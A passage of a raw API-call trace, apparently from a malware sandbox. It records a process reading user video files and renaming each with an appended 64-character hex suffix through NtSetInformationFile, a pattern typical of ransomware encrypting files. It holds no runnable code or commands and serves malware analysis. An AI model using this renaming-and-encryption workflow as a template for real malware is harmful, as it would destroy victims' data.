GetProcessHeap () returned 0x600000 [0125.338] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x128) returned 0x3154ed0 [0125.338] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3154ed0, Length=0x128, FileInformationClass=0xa) returned 0x0 [0125.339] CloseHandle (hObject=0x31c) returned 1 [0125.339] GetProcessHeap () returned 0x600000 [0125.339] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.340] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.354] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.354] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.355] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.356] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini", lpString2=".FB0C3D5BBF20838E563BA99644EE2E32FF78511951AF62CF8B48AA2A0D0A6447" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini.FB0C3D5BBF20838E563BA99644EE2E32FF78511951AF62CF8B48AA2A0D0A6447") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini.FB0C3D5BBF20838E563BA99644EE2E32FF78511951AF62CF8B48AA2A0D0A6447" [0125.356] GetProcessHeap () returned 0x600000 [0125.356] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x112) returned 0x31198c0 [0125.356] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x31198c0, Length=0x112, FileInformationClass=0xa) returned 0x0 [0125.359] CloseHandle (hObject=0x31c) returned 1 [0125.359] GetProcessHeap () returned 0x600000 [0125.359] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.359] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.366] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.367] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.368] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.368] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\6LuNV.mp4", lpString2=".72C0ABE040D2F8439D09BBF7A18E522A4011507D5903B0518BF149CA5B16E407" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\6LuNV.mp4.72C0ABE040D2F8439D09BBF7A18E522A4011507D5903B0518BF149CA5B16E407") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\6LuNV.mp4.72C0ABE040D2F8439D09BBF7A18E522A4011507D5903B0518BF149CA5B16E407" [0125.368] GetProcessHeap () returned 0x600000 [0125.368] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10a) returned 0x336d7b0 [0125.368] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x336d7b0, Length=0x10a, FileInformationClass=0xa) returned 0x0 [0125.369] CloseHandle (hObject=0x31c) returned 1 [0125.370] GetProcessHeap () returned 0x600000 [0125.370] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.370] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.379] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.380] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.382] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.383] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\BaTVdH1H2v8.flv", lpString2=".679F4F91F89FD2020268774220E3B5CF9BF8E50AFE3AC32D28D32F8A8AA1AC06" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\BaTVdH1H2v8.flv.679F4F91F89FD2020268774220E3B5CF9BF8E50AFE3AC32D28D32F8A8AA1AC06") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\BaTVdH1H2v8.flv.679F4F91F89FD2020268774220E3B5CF9BF8E50AFE3AC32D28D32F8A8AA1AC06" [0125.383] GetProcessHeap () returned 0x600000 [0125.383] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x116) returned 0x31190a8 [0125.383] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x31190a8, Length=0x116, FileInformationClass=0xa) returned 0x0 [0125.387] CloseHandle (hObject=0x31c) returned 1 [0125.387] GetProcessHeap () returned 0x600000 [0125.387] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.387] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.391] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.391] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.392] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.393] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\CHbyW-s4LK4YuXu.avi", lpString2=".35DC3C19CEF435EF6DA612CE2C44CC2B82F1475764E078A4AF504BE28BDB322A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\CHbyW-s4LK4YuXu.avi.35DC3C19CEF435EF6DA612CE2C44CC2B82F1475764E078A4AF504BE28BDB322A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\CHbyW-s4LK4YuXu.avi.35DC3C19CEF435EF6DA612CE2C44CC2B82F1475764E078A4AF504BE28BDB322A" [0125.393] GetProcessHeap () returned 0x600000 [0125.393] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11e) returned 0x3117d00 [0125.393] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3117d00, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0125.397] CloseHandle (hObject=0x31c) returned 1 [0125.398] GetProcessHeap () returned 0x600000 [0125.398] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.398] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.410] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.411] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.412] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.412] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\Ct98pwkcnPV0JiO9tM.avi", lpString2=".2A76DE57E8E94790CA66D8B4AB9FA854CEE0960EB30B9C846C7200221B5FFE76" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\Ct98pwkcnPV0JiO9tM.avi.2A76DE57E8E94790CA66D8B4AB9FA854CEE0960EB30B9C846C7200221B5FFE76") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\Ct98pwkcnPV0JiO9tM.avi.2A76DE57E8E94790CA66D8B4AB9FA854CEE0960EB30B9C846C7200221B5FFE76" [0125.412] GetProcessHeap () returned 0x600000 [0125.412] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x124) returned 0x3153058 [0125.412] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3153058, Length=0x124, FileInformationClass=0xa) returned 0x0 [0125.414] CloseHandle (hObject=0x31c) returned 1 [0125.414] GetProcessHeap () returned 0x600000 [0125.414] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.414] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.419] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.419] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.420] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.421] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\FUWphB.mp4", lpString2=".C2FB0A777EF42C6EEA6F3E8355F3496B86E37D535FDA414E5BA9EA4FE9896871" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\FUWphB.mp4.C2FB0A777EF42C6EEA6F3E8355F3496B86E37D535FDA414E5BA9EA4FE9896871") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\FUWphB.mp4.C2FB0A777EF42C6EEA6F3E8355F3496B86E37D535FDA414E5BA9EA4FE9896871" [0125.421] GetProcessHeap () returned 0x600000 [0125.421] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10c) returned 0x336d8c8 [0125.421] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x336d8c8, Length=0x10c, FileInformationClass=0xa) returned 0x0 [0125.423] CloseHandle (hObject=0x31c) returned 1 [0125.423] GetProcessHeap () returned 0x600000 [0125.423] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.424] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.429] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x2c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.429] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.430] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.430] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\g4dmS.avi", lpString2=".C63467F5E71680A2A962415306774CE75F1C25632E7114FAC59C0CB0B6930644" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\g4dmS.avi.C63467F5E71680A2A962415306774CE75F1C25632E7114FAC59C0CB0B6930644") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\g4dmS.avi.C63467F5E71680A2A962415306774CE75F1C25632E7114FAC59C0CB0B6930644" [0125.430] GetProcessHeap () returned 0x600000 [0125.430] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10a) returned 0x336d9e0 [0125.431] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x336d9e0, Length=0x10a, FileInformationClass=0xa) returned 0x0 [0125.432] CloseHandle (hObject=0x31c) returned 1 [0125.432] GetProcessHeap () returned 0x600000 [0125.432] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.432] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.436] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x3e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.436] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.437] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.437] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\gJMhNeSP2s.avi", lpString2=".CB6745F52648168F9A1C223D7205D78E6F278E1C015E73B9F8E056B3130F6771" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\gJMhNeSP2s.avi.CB6745F52648168F9A1C223D7205D78E6F278E1C015E73B9F8E056B3130F6771") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\gJMhNeSP2s.avi.CB6745F52648168F9A1C223D7205D78E6F278E1C015E73B9F8E056B3130F6771" [0125.437] GetProcessHeap () returned 0x600000 [0125.437] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x114) returned 0x31181a0 [0125.437] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x31181a0, Length=0x114, FileInformationClass=0xa) returned 0x0 [0125.438] CloseHandle (hObject=0x31c) returned 1 [0125.439] GetProcessHeap () returned 0x600000 [0125.439] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.439] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.442] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.443] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.443] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.444] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\H0_fl6.avi", lpString2=".90C29C2542A59F9CF9D8EED38FB2B5C91E44D11A67D607F5123C16E1F7FB257A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\H0_fl6.avi.90C29C2542A59F9CF9D8EED38FB2B5C91E44D11A67D607F5123C16E1F7FB257A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\H0_fl6.avi.90C29C2542A59F9CF9D8EED38FB2B5C91E44D11A67D607F5123C16E1F7FB257A" [0125.444] GetProcessHeap () returned 0x600000 [0125.444] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10c) returned 0x336daf8 [0125.444] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x336daf8, Length=0x10c, FileInformationClass=0xa) returned 0x0 [0125.445] CloseHandle (hObject=0x31c) returned 1 [0125.445] GetProcessHeap () returned 0x600000 [0125.445] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.446] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.449] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.449] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.450] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.451] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\ivlBW3u.avi", lpString2=".A320F032069B1D7D67090DF5F9B908731E5DB5E32574791B0DB9AC6AD778D570" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\ivlBW3u.avi.A320F032069B1D7D67090DF5F9B908731E5DB5E32574791B0DB9AC6AD778D570") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\ivlBW3u.avi.A320F032069B1D7D67090DF5F9B908731E5DB5E32574791B0DB9AC6AD778D570" [0125.451] GetProcessHeap () returned 0x600000 [0125.451] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10e) returned 0x336dc10 [0125.451] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x336dc10, Length=0x10e, FileInformationClass=0xa) returned 0x0 [0125.452] CloseHandle (hObject=0x31c) returned 1 [0125.452] GetProcessHeap () returned 0x600000 [0125.452] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.452] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.456] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x7a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.456] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.457] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.458] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\ODRsnlJ_t0JHd6Y82c9.mp4", lpString2=".0CE38C86138FFF8FFBE32C0B62CC8C59FD7DF716AAF568B5F11A558AD812E70D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\ODRsnlJ_t0JHd6Y82c9.mp4.0CE38C86138FFF8FFBE32C0B62CC8C59FD7DF716AAF568B5F11A558AD812E70D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\ODRsnlJ_t0JHd6Y82c9.mp4.0CE38C86138FFF8FFBE32C0B62CC8C59FD7DF716AAF568B5F11A558AD812E70D" [0125.458] GetProcessHeap () returned 0x600000 [0125.458] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x31537a8 [0125.458] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x31537a8, Length=0x126, FileInformationClass=0xa) returned 0x0 [0125.459] CloseHandle (hObject=0x31c) returned 1 [0125.460] GetProcessHeap () returned 0x600000 [0125.460] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.460] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.463] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.463] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.464] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.464] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\PzzkMt 64r72iW-fpP.mp4", lpString2=".9C2F0A6778F513337EFAAB4C4322EDFC0ED6C81F698085B22485F8B9A1B38A48" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\PzzkMt 64r72iW-fpP.mp4.9C2F0A6778F513337EFAAB4C4322EDFC0ED6C81F698085B22485F8B9A1B38A48") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\PzzkMt 64r72iW-fpP.mp4.9C2F0A6778F513337EFAAB4C4322EDFC0ED6C81F698085B22485F8B9A1B38A48" [0125.465] GetProcessHeap () returned 0x600000 [0125.465] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x124) returned 0x31538e0 [0125.465] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x31538e0, Length=0x124, FileInformationClass=0xa) returned 0x0 [0125.467] CloseHandle (hObject=0x31c) returned 1 [0125.468] GetProcessHeap () returned 0x600000 [0125.468] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.468] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.471] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.471] GetQueuedCompletionStatus (in: CompletionPort=0x274, 